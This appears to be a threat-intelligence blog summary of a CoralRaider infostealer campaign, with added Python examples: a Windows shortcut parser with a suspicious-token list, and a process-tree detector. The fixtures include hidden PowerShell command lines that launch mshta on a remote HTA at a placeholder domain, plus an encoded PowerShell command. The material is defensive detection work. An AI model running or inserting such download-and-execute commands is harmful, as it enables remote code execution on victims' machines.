TLDR:
- The CoralRaider threat actor has been identified in a new campaign targeting victims in multiple countries
- Initial access is a malicious LNK shortcut inside a ZIP archive; the later stages run in memory to evade antivirus detection
In a recent cybersecurity article, the CoralRaider threat actor has been identified in a new campaign targeting multiple countries, including the U.S., Nigeria, Germany, Egypt, the U.K., Poland, the Philippines, Norway, and Japan. The actor uses a multi-stage infection chain that starts when a victim opens a malicious Windows shortcut (LNK) embedded inside a ZIP archive. The shortcut carries an embedded PowerShell command that launches a malicious HTA file hosted on an attacker-controlled CDN domain.
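A shortcut's command line is stored in the LNK file itself, so the PowerShell command the article describes can be recovered from the ZIP attachment without ever double-clicking it. The following is an added example, not code from the article or from the threat report it summarizes: a minimal parser for the StringData section of the Shell Link (MS-SHLLINK) format, plus a triage check that flags shortcuts whose target or arguments mention PowerShell, mshta or a remote URL. The sample shortcut, the `cdn.example.com` domain and the `lure.hta` name are constructed for the example and are not indicators from the campaign.

```python
import struct

# Field layout and flag bits from the MS-SHLLINK (Shell Link binary file format) specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
# StringData blocks, when present, always appear in this order.
STRING_DATA_ORDER = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (target path, working dir, arguments, ...) of a .lnk file."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("missing shell link header")
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the variable-size IDList (2-byte size prefix)
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:                    # skip LinkInfo; its first dword is its total size
        (info_size,) = struct.unpack_from("<I", data, off)
        off += info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, off)   # CountCharacters, no terminator follows
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return fields


# Tokens that a benign document shortcut has no reason to carry in its target or arguments.
SUSPICIOUS_TOKENS = (
    "powershell", "mshta", "http://", "https://", "-enc", "-w hidden",
    "-windowstyle hidden", "iex", "invoke-expression", "downloadstring",
)


def triage_lnk(data: bytes):
    """Parse a shortcut; return (fields, suspicious tokens found in its target or arguments)."""
    fields = parse_lnk(data)
    haystack = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in haystack]
    return fields, hits


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk fixture (test data for this example, not a real sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex,
    # ShowCommand (7 = SW_SHOWMINNOACTIVE), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)
    idlist = struct.pack("<H", 2) + b"\x00\x00"          # empty ItemIDList + TerminalID
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments))
    terminal_block = b"\x00\x00\x00\x00"                 # ExtraData terminator
    return header + idlist + strings + terminal_block


if __name__ == "__main__":
    # Constructed sample mirroring the chain in the text: a shortcut that runs PowerShell,
    # which in turn calls mshta on a remotely hosted HTA. Domain and file name are placeholders.
    sample = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       r"C:\Windows\System32",
                       '-w hidden -c "mshta https://cdn.example.com/lure.hta"')
    fields, hits = triage_lnk(sample)
    print("arguments:", fields["arguments"])
    print("suspicious tokens:", hits)
```

To use it on a real attachment, extract the ZIP with `zipfile` and pass each `.lnk` member's bytes to `triage_lnk`; a shortcut that resolves to `powershell.exe` and carries a URL in its arguments is worth quarantining regardless of the icon it displays.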
The HTA file executes embedded JavaScript, which decodes and runs a PowerShell decryptor script; that script in turn decrypts a further embedded PowerShell loader, which runs in memory on the victim's machine. The loader script evades detection, bypasses User Account Control (UAC), and downloads and runs an information stealer such as Cryptbot, LummaC2, or Rhadamanthys.
The campaign also relies on living-off-the-land binaries (LOLBins): the loader script downloads the payload and writes it to a specific folder chosen to avoid detection. The payload is one of Cryptbot, LummaC2, or Rhadamanthys, each with its own methods of harvesting sensitive information from infected machines. The article also lists indicators of compromise, including SHA-256 hashes, file names, API calls, and IP addresses associated with the campaign.
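Because every stage up to the stealer download runs through signed Windows binaries (PowerShell and mshta.exe), the most reliable place to catch it is process-creation telemetry rather than the files on disk. The following is an added example, not from the article or the underlying report: a small detector run over constructed Sysmon-style process-creation events that flags the PowerShell-to-mshta-to-PowerShell parent/child pattern of the LNK and HTA stages described above. It does not cover the UAC bypass or the stealer payload, since the text does not specify how those are carried out. The events, PIDs and the `cdn.example.com` URL are constructed for the example.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
# Events 1000-4000 follow the chain in the text; event 5000 is a benign control.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "mshta https://cdn.example.com/lure.hta"'},
    {"pid": 3000, "ppid": 2000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://cdn.example.com/lure.hta"},
    {"pid": 4000, "ppid": 3000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},   # -enc SQBFAFgA decodes to "IEX"
    {"pid": 5000, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},   # local HTA opened from Explorer
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
HIDDEN_OR_ENCODED = ("-enc", "-e ", "-w hidden", "-windowstyle hidden", "-nop")


def image_name(image: str) -> str:
    """Basename of an image path, lower-cased for comparison."""
    return image.rsplit("\\", 1)[-1].lower()


def detect_lnk_hta_chain(events):
    """Return (pid, reason) alerts for the PowerShell -> mshta -> PowerShell pattern."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = image_name(parent["image"]) if parent else ""
        cmd = e["cmdline"].lower()
        # Stage 1: the LNK's embedded PowerShell hands a remote HTA to mshta.
        if name == "mshta.exe" and URL_RE.search(cmd):
            alerts.append((e["pid"], "mshta launched with a remote HTA URL"))
        if name == "mshta.exe" and parent_name == "powershell.exe":
            alerts.append((e["pid"], "mshta spawned by powershell"))
        # Stage 2: the HTA's JavaScript launches PowerShell to decrypt and run the loader.
        if name == "powershell.exe" and parent_name == "mshta.exe":
            reason = "powershell spawned by mshta"
            if any(tok in cmd for tok in HIDDEN_OR_ENCODED):
                reason += " with hidden/encoded command line"
            alerts.append((e["pid"], reason))
    return alerts


def ancestry(events, pid):
    """Image names from the oldest known ancestor down to pid, for the analyst's report."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # seen-set guards against PID-reuse loops
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, reason in detect_lnk_hta_chain(SAMPLE_EVENTS):
        print(pid, reason, "|", " -> ".join(ancestry(SAMPLE_EVENTS, pid)))
```

The benign control (a locally installed HTA opened from Explorer) produces no alert, which is the point of keying on the parent process and on a remote URL rather than on mshta.exe alone: mshta has legitimate uses, but an HTA fetched over HTTPS by a hidden PowerShell window does not.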
Overall, the article highlights the sophisticated tactics CoralRaider uses to evade antivirus detection and steal sensitive information from victims in multiple countries.